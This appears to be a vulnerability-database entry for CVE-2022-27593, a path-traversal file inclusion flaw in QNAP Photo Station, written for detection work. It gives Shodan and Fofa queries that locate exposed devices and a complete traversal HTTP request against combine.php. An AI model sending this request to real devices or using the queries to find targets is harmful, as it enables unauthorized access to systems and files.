🔙 목록으로 돌아가기

CVE-2022-27593: QNAP QTS Photo Station External Reference - Local File Inclusion

TitleQNAP QTS Photo Station External Reference - Local File Inclusion
Authorallenwest24
SeverityCritical
ImpactAn attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
RemediationApply the latest security patches and updates provided by QNAP to fix the local file inclusion vulnerability in QTS Photo Station.
CVSS Score9.1
EPSS Score0.93262
CVE IDCVE-2022-27593
CWE IDCWE-610
Shodan Querytitle:"QNAP"http.title:"photo station"http.title:"qnap"content-length: 580 "http server 1.0"
Fofa Querytitle="photo station"title="qnap"
Tags cve2022 cve qnap lfi kev vkev vuln

🔍 Vulnerability Description

QNAP QTS Photo Station External Reference is vulnerable to local file inclusion via an externally controlled reference to a resource vulnerability. If exploited, this could allow an attacker to modify system files. The vulnerability is fixed in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later.

🌐 HTTP Request

GET /photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php. HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-27593.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-27593.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A